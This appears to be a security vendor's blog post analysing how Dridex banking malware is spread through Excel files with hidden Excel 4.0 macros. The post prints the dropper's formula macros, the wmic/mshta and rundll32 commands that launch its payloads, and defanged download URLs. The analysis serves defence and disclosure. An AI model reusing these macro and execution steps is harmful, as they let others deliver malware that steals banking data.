Posted By jcleebobgatenet , September 8, 2021

Dridex Distributed Through Excel 4.0 Macro

The ASEC analysis team has recently discovered that the method of distributing Dridex via Excel files is changing more rapidly and frequently. The team has been introducing the distribution method of Dridex through the ASEC blog since last year, and the latest related post was uploaded last month to introduce Excel file that uses the task scheduler to distribute Dridex. The recently distributed Excel files use the Excel 4.0 macro instead of the VBA macro which was used in previous cases. We assume that the attacker made this change to bypass detection, and the interval at which the attacker is changing the method is becoming shorter.

The following figures show the content of Excel files that are being distributed as of now. They use various images to trick users into clicking the Enable Macro button.

The macro used to perform malicious activities is the Excel 4.0 macro, not the VBA macro that was used previously. When the macro is run, the formulas in cells are automatically executed through Auto_Open that exists in a hidden sheet and perform malicious activities.

Through Auto_Open, malicious formula macros are run in the following order, creating and running a malicious file.

Malicious Formula Macros
=FOPEN(GET.NOTE(Macro1!$A$3, 1, 200), 1+2)
=FOR.CELL(“HdOrvNpzIeLysqA”,D160:AR521, TRUE)
=FWRITE(B152,CHAR(HdOrvNpzIeLysqA))
=NEXT()
=FCLOSE(B152)
=EXEC(GET.NOTE(Macro1!$A$4, 1, 200))

The malicious data used in this stage are dispersed in cells with the note attached. The notes are hidden, but you can use the Show/Hide Note feature to check the malicious data. The data saved in notes show the path the file is created and the command that runs it. The data of the created file is saved in a certain cell (D160:AR521) in decimal.

The created malicious file is saved in the ProgramData folder with the sct extension and executed through the wmic command.

File Creation Path
C:\ProgramData\fCLjKsEAHjoxErF.sct

File Execution Command
wmic process call create ‘mshta C:\ProgramData\fCLjKsEAHjoxErF.sct’

Below is a part of the code for the created sct file, obfuscated with many annotations. When the file is run, it creates an additional sct file in the ProgramData folder. The additionally created file has the feature of running the dll file that is created after.

The file then attempts to connect to 5 URLs to download a malicious file and save it in the ProgramData folder with the dll extension. The downloaded dll was confirmed as Dridex.

Download URL
hxxp://coldchallenge[.]xyz:8080/js/filler_dk9naf.png
hxxp://updateviacloud[.]xyz:8080/files/filler_dk9naf.png
hxxp://updateviacloud[.]xyz:8080/wp-heme/filler_dk9naf.png
hxxp://updateviacloud[.]xyz:8080/js/filler_dk9naf.png
hxxps://space.egematey[.]com/wp-content/cache/wpfc-mobile-cache/proclus-the-quaestor/amp/j4a42p0W.php

After downloading the malware, the file runs the additionally created sct file.

The following shows a part of the code for the additionally created sct file. Once it is run, it executes the downloaded Dridex with the following command.

File Execution Command
wmic process call create “rundll32.exe C:\\ProgramData\ljneLUpdLaTjomtIyXuy.dll GetDesktopDPI”

Dridex is a banking malware that collects user information related to banking. It can also download the main module through a loader to perform additional malicious behaviors. In the past, there have been cases of malware distributing DopplePaymer, BitPaymer, and CLOP ransomware. Because Excel files that distribute Dridex are continuously changing and files that include malicious macros are mainly distributed through spam mails, users should refrain from opening files from unknown sources and take caution.

[File Detection]